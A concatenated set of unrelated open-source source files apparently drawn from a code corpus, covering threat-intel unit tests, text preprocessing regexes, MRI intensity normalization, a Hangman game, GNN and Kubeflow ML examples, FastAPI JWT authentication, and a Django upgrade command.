'enabled': True,
'mapping': {
'sourceAddress': 'ip',
'destinationDomain': 'domain',
'fileHash': 'md5'
}
}
}
StreamThreatIntel.load_intelligence(test_config, 'tests/unit/fixtures')
intelligence = StreamThreatIntel._StreamThreatIntel__intelligence # pylint: disable=no-member
expected_keys = ['domain', 'md5', 'ip']
assert_items_equal(intelligence.keys(), expected_keys)
assert_equal(len(intelligence['domain']), 10)
assert_equal(len(intelligence['md5']), 10)
assert_equal(len(intelligence['ip']), 10)
def test_do_not_load_intelligence(self):
"""Threat Intel - Do not load intelligence to memory when it is disabled"""
test_config = {
'threat_intel': {
'enabled': False,
'mapping': {
'sourceAddress': 'ip',
'destinationDomain': 'domain',
'fileHash': 'md5'
}
}
}
StreamThreatIntel.load_intelligence(test_config, 'tests/unit/fixtures')
intelligence = StreamThreatIntel._StreamThreatIntel__intelligence # pylint: disable=no-member
assert_equal(len(intelligence), 0)
def test_get_intelligence(self):
"""Threat Intel - get intelligence dictionary"""
test_config = {
'threat_intel': {
'enabled': True,
'mapping': {
'sourceAddress': 'ip',
'destinationDomain': 'domain',
'fileHash': 'md5'
}
}
}
StreamThreatIntel.load_intelligence(test_config, 'tests/unit/fixtures')
intelligence = StreamThreatIntel.get_intelligence()
expected_keys = ['domain', 'md5', 'ip']
assert_items_equal(intelligence.keys(), expected_keys)
assert_equal(len(intelligence['domain']), 10)
assert_equal(len(intelligence['md5']), 10)
assert_equal(len(intelligence['ip']), 10)
def test_get_config(self):
"""Threat Intel - get intelligence dictionary"""
test_config = {
'threat_intel': {
'enabled': True,
'mapping': {
'sourceAddress': 'ip',
'destinationDomain': 'domain',
'fileHash': 'md5'
}
}
}
StreamThreatIntel.load_intelligence(test_config, 'tests/unit/fixtures')
datatypes_ioc_mapping = StreamThreatIntel.get_config()
expected_keys = ['sourceAddress', 'destinationDomain', 'fileHash']
assert_items_equal(datatypes_ioc_mapping.keys(), expected_keys)
assert_equal(datatypes_ioc_mapping['sourceAddress'], 'ip')
assert_equal(datatypes_ioc_mapping['destinationDomain'], 'domain')
assert_equal(datatypes_ioc_mapping['fileHash'], 'md5')
def test_no_config_loaded(self):
"""Threat Intel - No datatypes_ioc_mapping config loaded if it is disabled"""
test_config = {
'threat_intel': {
'enabled': False,
'mapping': {
'sourceAddress': 'ip',
'destinationDomain': 'domain',
'fileHash': 'md5'
}
}
}
StreamThreatIntel.load_intelligence(test_config, 'tests/unit/fixtures')
datatypes_ioc_mapping = StreamThreatIntel.get_config()
assert_equal(len(datatypes_ioc_mapping), 0)
| 2.25 | 2 |
social_regexp/processing.py | TezRomacH/social-regexp | 0 | 12786318 | <gh_stars>0
from typing import Pattern
import re
import string
from social_regexp.constants import (
HASH_TOKEN,
MENTION_TOKEN,
NON_RUSSIAN_CYRILLIC_LETTERS,
PHONE_TOKEN,
URL_TOKEN,
_blank_spaces,
_hashtags,
_mentions,
_phones,
_single_letter_word,
_spaces_before_punctuation,
_url_regex,
)
def not_contains_non_russian_cyrillic_letters(text: str) -> bool:
"""Checks if a text contains any non-russian but cyrillic letter."""
return all(letter not in NON_RUSSIAN_CYRILLIC_LETTERS for letter in text)
def url() -> Pattern[str]:
"""Returns a pattern to match URLs."""
return _url_regex
def spaces_before_punctuation() -> Pattern[str]:
"""Returns a pattern to match spaces before punctuation."""
return _spaces_before_punctuation
def single_letter_words() -> Pattern[str]:
"""Returns a pattern to match single letter words."""
return _single_letter_word
def blank_spaces() -> Pattern[str]:
"""Returns a pattern to match blank spaces."""
return _blank_spaces
def mentions() -> Pattern[str]:
"""Returns a pattern to match mentions from Twitter or Instagram."""
return _mentions
def hashtags() -> Pattern[str]:
"""Returns a pattern to match mentions from Twitter or Instagram."""
return _hashtags
def phones() -> Pattern[str]:
"""Returns a pattern to match phone numbers."""
return _phones
def remove_urls(text: str, repl: str = "") -> str:
"""Return new string with replaced URLs to `repl`."""
return re.sub(pattern=_url_regex, repl=repl, string=text)
def remove_spaces_before_punctuation(text: str) -> str:
"""Return new string without spaces before punctuations."""
return re.sub(pattern=_spaces_before_punctuation, repl=r"\1", string=text)
def remove_punctuation(text: str) -> str:
"""Return new string without punctuations."""
return text.translate(str.maketrans("", "", string.punctuation))
def remove_hashtags(text: str, repl: str = "") -> str:
"""Return new string with replaced Twitter/Instagram mentions to `repl`."""
return re.sub(pattern=_hashtags, repl=repl, string=text)
def remove_mentions(text: str, repl: str = "") -> str:
"""Return new string with replaced Twitter/Instagram mentions to `repl`."""
return re.sub(pattern=_mentions, repl=repl, string=text)
def remove_single_letter_words(text: str) -> str:
"""Return new string without single-letter words."""
return re.sub(pattern=_single_letter_word, repl="", string=text)
def remove_blank_spaces(text: str) -> str:
"""Return new string without blank spaces."""
return re.sub(pattern=_blank_spaces, repl=" ", string=text)
def remove_phones(text: str, repl: str = "") -> str:
"""Return new string with replaced phone numbers to `repl`."""
return re.sub(pattern=_phones, repl=repl, string=text)
def preprocess_text(text: str) -> str:
"""Return new string with tokenized and processed text."""
result = remove_mentions(text, repl=MENTION_TOKEN)
result = remove_phones(result, repl=PHONE_TOKEN)
result = remove_urls(result, repl=URL_TOKEN)
result = remove_hashtags(result, repl=HASH_TOKEN)
result = remove_blank_spaces(result).strip()
result = remove_spaces_before_punctuation(result)
return result
__all__ = [
"not_contains_non_russian_cyrillic_letters",
"url",
"spaces_before_punctuation",
"single_letter_words",
"blank_spaces",
"mentions",
"phones",
"remove_urls",
"remove_spaces_before_punctuation",
"remove_punctuation",
"remove_mentions",
"remove_single_letter_words",
"remove_blank_spaces",
"remove_phones",
"preprocess_text",
"remove_hashtags",
]
| 3.25 | 3 |
app/ztp/mongo/models/template.py | cmlccie/rapid-ztp | 7 | 12786319 | <filename>app/ztp/mongo/models/template.py
"""Template MongoDB data model.
Copyright (c) 2019 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Cisco Sample
Code License, Version 1.1 (the "License"). You may obtain a copy of the
License at
https://developer.cisco.com/docs/licenses
All use of the material herein must be in accordance with the terms of
the License. All rights not expressly granted by the License are
reserved. Unless required by applicable law or agreed to separately in
writing, software distributed under the License is distributed on an "AS
IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
or implied.
"""
from datetime import datetime
from hashlib import sha256
from mongoengine import (
DateTimeField, DynamicDocument, StringField, signals,
)
class Template(DynamicDocument):
"""Template document."""
name = StringField(required=True, unique=True)
template = StringField(required=True)
sha256 = StringField()
updated = DateTimeField()
meta = {
"collection": "templates",
"indexes": [
"name",
"sha256",
]
}
@classmethod
def pre_save(cls, sender, document, **kwargs):
"""Update the template attributes before saving the document."""
assert isinstance(document, Template)
document.updated = datetime.utcnow()
document.sha256 = sha256(document.template.encode("utf-8")).hexdigest()
signals.pre_save.connect(
Template.pre_save,
sender=Template
)
| 2.078125 | 2 |
intensity_normalization/normalize/nyul.py | AlaSummer/intensity-normalization | 0 | 12786320 | <reponame>AlaSummer/intensity-normalization<filename>intensity_normalization/normalize/nyul.py
"""Nyul & Udupa piecewise linear histogram matching normalization
Author: <NAME> <<EMAIL>>
Created on: 02 Jun 2021
"""
from __future__ import annotations
__all__ = ["NyulNormalize"]
import argparse
import builtins
import collections.abc
import typing
import numpy as np
import numpy.typing as npt
from scipy.interpolate import interp1d
import intensity_normalization.errors as intnorme
import intensity_normalization.normalize.base as intnormb
import intensity_normalization.typing as intnormt
import intensity_normalization.util.io as intnormio
class NyulNormalize(intnormb.DirectoryNormalizeCLI):
"""Nyul & Udupa piecewise linear histogram matching normalization
Args:
output_min_value: where min-percentile mapped for output normalized image
output_max_value: where max-percentile mapped for output normalized image
min_percentile: min percentile to account for while finding
standard histogram
max_percentile: max percentile to account for while finding
standard histogram
next_percentile_after_min: next percentile after min for finding
standard histogram (percentile-step creates intermediate percentiles)
prev_percentile_before_max: previous percentile before max for finding
standard histogram (percentile-step creates intermediate percentiles)
percentile_step: percentile steps between next-percentile-after-min and
prev-percentile-before-max for finding standard histogram
"""
def __init__(
self,
*,
output_min_value: builtins.float = 1.0,
output_max_value: builtins.float = 100.0,
min_percentile: builtins.float = 1.0,
max_percentile: builtins.float = 99.0,
percentile_after_min: builtins.float = 10.0,
percentile_before_max: builtins.float = 90.0,
percentile_step: builtins.float = 10.0,
):
super().__init__()
self.output_min_value = output_min_value
self.output_max_value = output_max_value
self.min_percentile = min_percentile
self.max_percentile = max_percentile
self.percentile_after_min = percentile_after_min
self.percentile_before_max = percentile_before_max
self.percentile_step = percentile_step
self._percentiles: npt.ArrayLike | None = None
self.standard_scale: npt.ArrayLike | None = None
def normalize_image(
self,
image: intnormt.ImageLike,
/,
mask: intnormt.ImageLike | None = None,
*,
modality: intnormt.Modalities = intnormt.Modalities.T1,
) -> intnormt.ImageLike:
voi = self._get_voi(image, mask, modality=modality)
landmarks = self.get_landmarks(voi)
if self.standard_scale is None:
msg = "This class must be fit before being called."
raise intnorme.NormalizationError(msg)
f = interp1d(landmarks, self.standard_scale, fill_value="extrapolate")
normalized: intnormt.ImageLike = f(image)
return normalized
@property
def percentiles(self) -> npt.NDArray:
if self._percentiles is None:
percs = np.arange(
self.percentile_after_min,
self.percentile_before_max + self.percentile_step,
self.percentile_step,
)
_percs = ([self.min_percentile], percs, [self.max_percentile])
self._percentiles = np.concatenate(_percs)
assert isinstance(self._percentiles, np.ndarray)
return self._percentiles
def get_landmarks(self, image: intnormt.ImageLike, /) -> npt.NDArray:
landmarks = np.percentile(image, self.percentiles)
return landmarks # type: ignore[return-value]
def _fit(
self,
images: collections.abc.Sequence[intnormt.ImageLike],
/,
masks: collections.abc.Sequence[intnormt.ImageLike] | None = None,
*,
modality: intnormt.Modalities = intnormt.Modalities.T1,
**kwargs: typing.Any,
) -> None:
"""Compute standard scale for piecewise linear histogram matching
Args:
images: set of NifTI MR image paths which are to be normalized
masks: set of corresponding masks (if not provided, estimated)
modality: modality of all images
"""
n_percs = len(self.percentiles)
standard_scale = np.zeros(n_percs)
n_images = len(images)
if masks is not None and n_images != len(masks):
raise ValueError("There must be an equal number of images and masks.")
for i, (image, mask) in enumerate(intnormio.zip_with_nones(images, masks)):
voi = self._get_voi(image, mask, modality=modality)
landmarks = self.get_landmarks(voi)
min_p = np.percentile(voi, self.min_percentile)
max_p = np.percentile(voi, self.max_percentile)
f = interp1d([min_p, max_p], [self.output_min_value, self.output_max_value])
landmarks = np.array(f(landmarks))
standard_scale += landmarks
self.standard_scale = standard_scale / n_images
def save_additional_info(
self,
args: argparse.Namespace,
**kwargs: typing.Any,
) -> None:
if args.save_standard_histogram is not None:
self.save_standard_histogram(args.save_standard_histogram)
def save_standard_histogram(self, filename: intnormt.PathLike) -> None:
if self.standard_scale is None:
msg = "This class must be fit before being called."
raise intnorme.NormalizationError(msg)
np.save(filename, np.vstack((self.standard_scale, self.percentiles)))
def load_standard_histogram(self, filename: intnormt.PathLike) -> None:
data = np.load(filename)
self.standard_scale = data[0, :]
self._percentiles = data[1, :]
@staticmethod
def name() -> builtins.str:
return "nyul"
@staticmethod
def fullname() -> builtins.str:
return "Nyul & Udupa"
@staticmethod
def description() -> builtins.str:
desc = "Perform piecewise-linear histogram matching per "
desc += "Nyul and Udupa given a set of MR images."
return desc
@staticmethod
def add_method_specific_arguments(
parent_parser: argparse.ArgumentParser,
) -> argparse.ArgumentParser:
parser = parent_parser.add_argument_group("method-specific arguments")
parser.add_argument(
"-ssh",
"--save-standard-histogram",
default=None,
type=intnormt.save_file_path(),
help="Save the standard histogram fit by the method.",
)
parser.add_argument(
"-lsh",
"--load-standard-histogram",
default=None,
type=intnormt.file_path(),
help="Load a standard histogram previously fit by the method.",
)
parser.add_argument(
"--output-min-value",
type=float,
default=1.0,
help="Value 'min-percentile' mapped to for output normalized image.",
)
parser.add_argument(
"--output-max-value",
type=float,
default=100.0,
help="Value 'max-percentile' mapped to for output normalized image.",
)
parser.add_argument(
"--min-percentile",
type=float,
default=1.0,
help="Min. percentile to account for while finding standard histogram.",
)
parser.add_argument(
"--max-percentile",
type=float,
default=99.0,
help="Max. percentile to account for while finding standard histogram.",
)
parser.add_argument(
"--percentile-after-min",
type=float,
default=10.0,
help="Percentile after min. for finding standard histogram "
"('percentile-step' creates intermediate percentiles between "
"this and 'percentile-before-max').",
)
parser.add_argument(
"--percentile-before-max",
type=float,
default=90.0,
help="Percentile before max. for finding standard histogram "
"('percentile-step' creates intermediate percentiles between "
"this and 'percentile-after-min').",
)
parser.add_argument(
"--percentile-step",
type=float,
default=10.0,
help="Percentile steps between 'percentile-after-min' and "
"'prev-percentile-before-max' for finding standard histogram",
)
return parent_parser
def call_from_argparse_args(
self, args: argparse.Namespace, /, **kwargs: typing.Any
) -> None:
if args.load_standard_histogram is not None:
self.load_standard_histogram(args.load_standard_histogram)
self.fit = lambda *args, **kwargs: None # type: ignore[assignment]
super().call_from_argparse_args(args)
@classmethod
def from_argparse_args(cls, args: argparse.Namespace, /) -> NyulNormalize:
return cls(
output_min_value=args.output_min_value,
output_max_value=args.output_max_value,
min_percentile=args.min_percentile,
max_percentile=args.max_percentile,
percentile_after_min=args.percentile_after_min,
percentile_before_max=args.percentile_before_max,
percentile_step=args.percentile_step,
)
| 2.28125 | 2 |
pset (HangMan)/hangman.py | Hammad-001/MIT-6.0001-psets-Solutions | 2 | 12786321 | <filename>pset (HangMan)/hangman.py<gh_stars>1-10
# Problem Set 2, hangman.py
# Name: <NAME>
# Collaborators: None
# Hangman Game
# -----------------------------------
import random
import string
WORDLIST_FILENAME = "words.txt"
def load_words():
"""
Returns a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
"""
print("Loading word list from file...")
# inFile: file
inFile = open(WORDLIST_FILENAME, 'r')
# line: string
line = inFile.readline()
# wordlist: list of strings
wordlist = line.split()
print(" ", len(wordlist), "words loaded.")
return wordlist
# choosing random word
def choose_word(wordlist):
"""
wordlist (list): list of words (strings)
Returns a word from wordlist at random
"""
word = random.choice(wordlist)
return word
# -----------------------------------
def is_word_guessed(secret_word, letters_guessed):
'''
secret_word: string, the word the user is guessing; assumes all letters are
lowercase
letters_guessed: list (of letters), which letters have been guessed so far;
assumes that all letters are lowercase
returns: boolean, True if all the letters of secret_word are in letters_guessed;
False otherwise
'''
for alpha in secret_word:
if alpha not in letters_guessed:
return False
return True
def get_guessed_word(secret_word, letters_guessed):
'''
secret_word: string, the word the user is guessing
letters_guessed: list (of letters), which letters have been guessed so far
returns: string, comprised of letters, underscores (_), and spaces that represents
which letters in secret_word have been guessed so far.
'''
stringofwords = ' '
for i in range(len(secret_word)):
if secret_word[i] in letters_guessed:
stringofwords = stringofwords+' '+secret_word[i]
else:
stringofwords = stringofwords + ' _ '
return stringofwords
def get_available_letters(letters_guessed):
'''
letters_guessed: list (of letters), which letters have been guessed so far
returns: string (of letters), comprised of letters that represents which letters have not
yet been guessed.
'''
letters = string.ascii_lowercase
for i in range(len(letters_guessed)):
if letters_guessed[i] in letters:
letters = letters.replace(letters_guessed[i], '')
return letters
def hangman(secret_word):
'''
secret_word: string, the secret word to guess.
Starts up an interactive game of Hangman.
* At the start of the game, let the user know how many
letters the secret_word contains and how many guesses s/he starts with.
* The user should start with 6 guesses
* Before each round, you should display to the user how many guesses
s/he has left and the letters that the user has not yet guessed.
* Ask the user to supply one guess per round. Remember to make
sure that the user puts in a letter!
* The user should receive feedback immediately after each guess
about whether their guess appears in the computer's word.
* After each guess, you should display to the user the
partially guessed word so far.
Follows the other limitations detailed in the problem write-up.
'''
print("Welcome to the Game Hangman!")
print("I am thinking of a word which is",len(secret_word),'long')
print("--------------------")
Guesses = 6
Warnings = 3
letters_guessed = []
vowels = ['a', 'e', 'i', 'u', 'o']
while Guesses > 0 and is_word_guessed(secret_word,letters_guessed) == False:
print("You have", Warnings, 'Warnings left.')
print("You have",Guesses,'guesses left.')
print("Available Letters:",get_available_letters(letters_guessed))
guess = input('Please guess a letter:')
guess = guess.strip().lower()
if guess in secret_word:
if guess in letters_guessed:
if Warnings > 0:
Warnings -= 1
print("Oops! You have already guessed that letter. You now have",Warnings,"Warnings left"
"\n Word: ",get_guessed_word(secret_word,letters_guessed))
else:
Guesses -=1
print("Oops! You have already guessed that letter. Word:",get_guessed_word(secret_word, letters_guessed))
elif guess not in letters_guessed:
letters_guessed.append(guess)
print('Good Guess!',get_guessed_word(secret_word,letters_guessed))
elif guess.isalpha() == False or len(guess) != 1:
if Warnings > 0:
Warnings -= 1
print("Oops! That is not a valid letter. You have", Warnings, "Warnings left.\n Word:",
get_guessed_word(secret_word, letters_guessed))
else:
Guesses -= 1
print("Oops! That is not a valid letter. Word:",
get_guessed_word(secret_word, letters_guessed))
elif guess in vowels:
for vowel in vowels:
if vowel not in secret_word:
Guesses -= 2
print("Oops! That letter is not in my word:", get_guessed_word(secret_word, letters_guessed))
else:
print("Oops! That letter is not in my word:", get_guessed_word(secret_word, letters_guessed))
Guesses -= 1
print("--------------------")
if is_word_guessed(secret_word,letters_guessed) == True:
print("Congratulations, You Won!")
print("Your Score is", Guesses * len(secret_word))
elif is_word_guessed(secret_word,letters_guessed) == False:
print("Sorry! you ran out of guesses. The word was", secret_word)
# When you've completed your hangman function, scroll down to the bottom
# of the file and uncomment the first two lines to test
#(hint: you might want to pick your own
# secret_word while you're doing your own testing)
# -----------------------------------
def match_with_gaps(my_word, other_word):
'''
my_word: string with _ characters, current guess of secret word
other_word: string, regular English word
returns: boolean, True if all the actual letters of my_word match the
corresponding letters of other_word, or the letter is the special symbol
_ , and my_word and other_word are of the same length;
False otherwise:
'''
my_word = my_word.replace(' ','')
if len(other_word) == len(my_word):
for i in range(len(my_word)):
if my_word[i] == other_word[i]:
continue
if my_word[i] == '_' and other_word[i] not in list(my_word):
continue
else:
return False
return True
else:
return False
def show_possible_matches(my_word):
'''
my_word: string with _ characters, current guess of secret word
returns: nothing, but should print out every word in wordlist that matches my_word
Keep in mind that in hangman when a letter is guessed, all the positions
at which that letter occurs in the secret word are revealed.
Therefore, the hidden letter(_ ) cannot be one of the letters in the word
that has already been revealed.
'''
words = ""
count =0
for word in wordlist:
if count % 5 == 0:
words += '\n'
if match_with_gaps(my_word,word):
words += word +" "
count += 1
else:
continue
if words == '':
print("No match found!")
else:
print(words)
def hangman_with_hints(secret_word):
'''
secret_word: string, the secret word to guess.
Starts up an interactive game of Hangman.
* At the start of the game, let the user know how many
letters the secret_word contains and how many guesses s/he starts with.
* The user should start with 6 guesses
* Before each round, you should display to the user how many guesses
s/he has left and the letters that the user has not yet guessed.
* Ask the user to supply one guess per round. Make sure to check that the user guesses a letter
* The user should receive feedback immediately after each guess
about whether their guess appears in the computer's word.
* After each guess, you should display to the user the
partially guessed word so far.
* If the guess is the symbol *, print out all words in wordlist that
matches the current guessed word.
Follows the other limitations detailed in the problem write-up.
'''
print("Welcome to the Game Hangman!")
print("I am thinking of a word which is", len(secret_word), 'long')
print("--------------------")
Guesses = 6
Warnings = 3
letters_guessed = []
vowels = ['a','e','i','u','o']
while Guesses > 0 and is_word_guessed(secret_word, letters_guessed) == False:
print("You have", Warnings, 'Warnings left.')
print("You have", Guesses, 'guesses left.')
print("Available Letters:", get_available_letters(letters_guessed))
guess = input('Please guess a letter:')
guess = guess.strip().lower()
if guess == '*':
show_possible_matches(get_guessed_word(secret_word, letters_guessed))
elif guess in secret_word:
if guess in letters_guessed:
if Warnings > 0:
Warnings -= 1
print("Oops! You have already guessed that letter. You now have", Warnings, "Warnings left"
"\n Word: ",
get_guessed_word(secret_word, letters_guessed))
else:
Guesses -= 1
print("Oops! You have already guessed that letter. Word:",
get_guessed_word(secret_word, letters_guessed))
elif guess not in letters_guessed:
letters_guessed.append(guess)
print('Good Guess!', get_guessed_word(secret_word, letters_guessed))
elif guess.isalpha() == False or len(guess) != 1:
if Warnings > 0:
Warnings -= 1
print("Oops! That is not a valid letter. You have", Warnings, "Warnings left.\n Word:",
get_guessed_word(secret_word, letters_guessed))
else:
Guesses -= 1
print("Oops! That is not a valid letter. Word:",
get_guessed_word(secret_word, letters_guessed))
elif guess in vowels:
for vowel in vowels:
if vowel not in secret_word:
Guesses -= 2
print("Oops! That letter is not in my word:", get_guessed_word(secret_word, letters_guessed))
else:
print("Oops! That letter is not in my word:", get_guessed_word(secret_word, letters_guessed))
Guesses -= 1
print("--------------------")
if is_word_guessed(secret_word, letters_guessed) == True:
print("Congratulations, You Won!")
print("Your Score is", Guesses * len(secret_word))
elif is_word_guessed(secret_word, letters_guessed) == False:
print("Sorry! you ran out of guesses. The word was", secret_word)
if __name__ == "__main__":
wordlist = load_words()
# wordlist = _words()
# To test part 1, comment out the pass line above and
# uncomment the following three lines.
# secret_word = 'apple'
# letters_guessed = ['a','a','l','r','z']
# print(get_guessed_word(secret_word, letters_guessed))
# To test part 2, comment out the pass line above and
# uncomment the following two lines.
# secret_word = choose_word(wordlist)
# hangman(secret_word)
###############
# To test part 3 re-comment out the above lines and
# uncomment the following two lines.
# secret_word = choose_word(wordlist)
# hangman_with_hints(secret_word)
| 3.9375 | 4 |
examples/graph_prediction/general_gnn.py | JonaBecher/spektral | 2,145 | 12786322 | """
This example implements the model from the paper
> [Design Space for Graph Neural Networks](https://arxiv.org/abs/2011.08843)<br>
> <NAME>, <NAME>, <NAME>
using the PROTEINS dataset.
The configuration at the top of the file is the best one identified in the
paper, and should work well for many different datasets without changes.
Note: the results reported in the paper are averaged over 3 random repetitions
with an 80/20 split.
"""
import numpy as np
import tensorflow as tf
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.metrics import categorical_accuracy
from tensorflow.keras.optimizers import Adam
from spektral.data import DisjointLoader
from spektral.datasets import TUDataset
from spektral.models import GeneralGNN
physical_devices = tf.config.list_physical_devices("GPU")
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
################################################################################
# Config
################################################################################
batch_size = 32
learning_rate = 0.01
epochs = 400
################################################################################
# Load data
################################################################################
data = TUDataset("PROTEINS")
# Train/test split
np.random.shuffle(data)
split = int(0.8 * len(data))
data_tr, data_te = data[:split], data[split:]
# Data loaders
loader_tr = DisjointLoader(data_tr, batch_size=batch_size, epochs=epochs)
loader_te = DisjointLoader(data_te, batch_size=batch_size)
################################################################################
# Build model
################################################################################
model = GeneralGNN(data.n_labels, activation="softmax")
optimizer = Adam(learning_rate)
loss_fn = CategoricalCrossentropy()
################################################################################
# Fit model
################################################################################
@tf.function(input_signature=loader_tr.tf_signature(), experimental_relax_shapes=True)
def train_step(inputs, target):
with tf.GradientTape() as tape:
predictions = model(inputs, training=True)
loss = loss_fn(target, predictions) + sum(model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
acc = tf.reduce_mean(categorical_accuracy(target, predictions))
return loss, acc
def evaluate(loader):
output = []
step = 0
while step < loader.steps_per_epoch:
step += 1
inputs, target = loader.__next__()
pred = model(inputs, training=False)
outs = (
loss_fn(target, pred),
tf.reduce_mean(categorical_accuracy(target, pred)),
len(target), # Keep track of batch size
)
output.append(outs)
if step == loader.steps_per_epoch:
output = np.array(output)
return np.average(output[:, :-1], 0, weights=output[:, -1])
epoch = step = 0
results = []
for batch in loader_tr:
step += 1
loss, acc = train_step(*batch)
results.append((loss, acc))
if step == loader_tr.steps_per_epoch:
step = 0
epoch += 1
results_te = evaluate(loader_te)
print(
"Ep. {} - Loss: {:.3f} - Acc: {:.3f} - Test loss: {:.3f} - Test acc: {:.3f}".format(
epoch, *np.mean(results, 0), *results_te
)
)
results = []
################################################################################
# Evaluate model
################################################################################
results_te = evaluate(loader_te)
print("Final results - Loss: {:.3f} - Acc: {:.3f}".format(*results_te))
| 2.640625 | 3 |
problems/044.py | JoshKarpel/Euler | 1 | 12786323 | <filename>problems/044.py
from math import sqrt
import collections
from problems import utils
@utils.memoize
def pentagon(n):
return int(n * ((3 * n) - 1) / 2)
def solve():
upper_bound = 3000
pentagons = set((pentagon(n) for n in range(1, upper_bound)))
for n in range(1, upper_bound):
p_n = pentagon(n)
for m in range(1, n):
p_m = pentagon(m)
if p_n - p_m in pentagons and p_n + p_m in pentagons:
return p_n - p_m
if __name__ == '__main__':
print(solve())
| 3.75 | 4 |
kfp_fashion_mnist.py | JavaDerek/FashionMnistKF | 3 | 12786324 | import kfp.dsl as dsl
class ObjectDict(dict):
def __getattr__(self, name):
if name in self:
return self[name]
else:
raise AttributeError("No such attribute: " + name)
@dsl.pipeline(
name='fashion mnist',
description='Train and Deploy Fashion MNIST'
)
def train_and_deploy(
download_and_preprocess="full"
):
# Step 1: download and store data in pipeline
download = dsl.ContainerOp(
name='download',
# image needs to be a compile-time string
image='docker.io/dotnetderek/download:latest',
arguments=[
download_and_preprocess
],
file_outputs={
'trainImages':'/trainImagesObjectName.txt',
'trainLabels':'/trainLabelsObjectName.txt',
'testImages':'/testImagesObjectName.txt',
'testLabels':'/testLabelsObjectName.txt'
}
)
# Step 2: normalize data between 0 and 1
preprocess = dsl.ContainerOp(
name='preprocess',
# image needs to be a compile-time string
image='docker.io/dotnetderek/preprocess:latest',
arguments=[
download.outputs['trainImages'],
download.outputs['trainLabels'],
download.outputs['testImages'],
download.outputs['testLabels'],
download_and_preprocess
],
file_outputs={
'normalizedTrainImages':'/trainImagesObjectName.txt',
'normalizedTestImages':'/testImagesObjectName.txt'
}
)
# Step 3: train a model
train = dsl.ContainerOp(
name='train',
# image needs to be a compile-time string
image='docker.io/dotnetderek/train:latest',
arguments=[
preprocess.outputs['normalizedTrainImages'],
download.outputs['trainLabels']
],
file_outputs={
'trainedModelName':'/trainedModelName.txt'
}
)
# Step 4: evaluate model
evaluate = dsl.ContainerOp(
name='evaluate',
# image needs to be a compile-time string
image='docker.io/dotnetderek/evaluate:latest',
arguments=[
preprocess.outputs['normalizedTestImages'],
download.outputs['testLabels'],
train.outputs['trainedModelName']
],
file_outputs={
}
)
if __name__ == '__main__':
import kfp.compiler as compiler
import sys
if len(sys.argv) != 2:
print("Usage: kfp_fashion_mnist pipeline-output-name")
sys.exit(-1)
filename = sys.argv[1]
compiler.Compiler().compile(train_and_deploy, filename) | 2.765625 | 3 |
fastapi_crud_orm_connector/api/auth.py | christinoleo/fastapi_crud_orm_connector | 0 | 12786325 | <reponame>christinoleo/fastapi_crud_orm_connector<filename>fastapi_crud_orm_connector/api/auth.py
from fastapi import Depends, HTTPException, status
from jose import jwt, JWTError
from fastapi_crud_orm_connector import schemas
from fastapi_crud_orm_connector.api import security
from fastapi_crud_orm_connector.utils.database_session import DatabaseSession
class Authentication:
def __init__(self, database_session: DatabaseSession, user_crud, secret_key: str, algorithm: str = "HS256"):
self.secret_key = secret_key
self.algorithm = algorithm
self.user_crud = user_crud
self.database_session = database_session
self.get_db = self.database_session.get_db
async def _get_current_user(db=Depends(database_session.get_db), token: str = Depends(security.oauth2_scheme)):
credentials_exception = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Could not validate credentials",
headers={"WWW-Authenticate": "Bearer"},
)
try:
payload = jwt.decode(
token, self.secret_key, algorithms=[self.algorithm]
)
email: str = payload.get("sub")
if email is None:
raise credentials_exception
permissions: str = payload.get("permissions")
token_data = schemas.TokenData(email=email, permissions=permissions)
except JWTError:
raise credentials_exception
user = user_crud.use_db(db).get_user_by_email(token_data.email)
if user is None:
raise credentials_exception
return user
async def _get_current_active_user(current_user=Depends(_get_current_user)):
if not current_user.is_active:
raise HTTPException(status_code=400, detail="Inactive user")
return current_user
async def _get_current_active_superuser(current_user=Depends(_get_current_user), ):
if not current_user.is_superuser:
raise HTTPException(
status_code=403, detail="The user doesn't have enough privileges"
)
return current_user
self.get_current_user = _get_current_user
self.get_current_active_user = _get_current_active_user
self.get_current_active_superuser = _get_current_active_superuser
def authenticate_user(self, db, email: str, password: str):
user = self.user_crud.use_db(db).get_user_by_email(email, include_password=True)
if not user:
return False
if not security.verify_password(password, user.hashed_password):
return False
return user
def sign_up_new_user(self, db, email: str, password: str):
user = self.user_crud.use_db(db).get_user_by_email(email)
if user:
return False # User already exists
new_user = self.user_crud.use_db(db).create_user(
schemas.UserCreate(
email=email,
password=password,
is_active=True,
is_superuser=False,
),
)
return new_user
| 2.28125 | 2 |
orchestra/management/commands/upgradeorchestra.py | udm88/django-orchestra | 68 | 12786326 | <gh_stars>10-100
import functools
import os
import random
import string
from distutils.sysconfig import get_python_lib
from optparse import make_option
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from orchestra import get_version
from orchestra.utils.sys import run, check_root
r = functools.partial(run, silent=False)
def get_existing_pip_installation():
""" returns current pip installation path """
if run("pip freeze|grep django-orchestra", valid_codes=(0,1)).exit_code == 0:
for lib_path in get_python_lib(), get_python_lib(prefix="/usr/local"):
existing_path = os.path.abspath(os.path.join(lib_path, "orchestra"))
if os.path.exists(existing_path):
return existing_path
return None
class Command(BaseCommand):
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
self.option_list = BaseCommand.option_list + (
make_option('--pip_only', action='store_true', dest='pip_only', default=False,
help='Only run "pip install django-orchestra --upgrade"'),
make_option('--orchestra_version', dest='version', default=False,
help='Specifies what version of the Orchestra you want to install'),
)
option_list = BaseCommand.option_list
help = "Upgrading Orchestra's installation. Desired version is accepted as argument"
can_import_settings = False
leave_locale_alone = True
@check_root
def handle(self, *args, **options):
current_version = get_version()
current_path = get_existing_pip_installation()
if current_path is not None:
desired_version = options.get('version')
if args:
desired_version = args[0]
if current_version == desired_version:
msg = "Not upgrading, you already have version %s installed"
raise CommandError(msg % desired_version)
# Create a backup of current installation
base_path = os.path.abspath(os.path.join(current_path, '..'))
char_set = string.ascii_uppercase + string.digits
rand_name = ''.join(random.sample(char_set, 6))
backup = os.path.join(base_path, 'orchestra.' + rand_name)
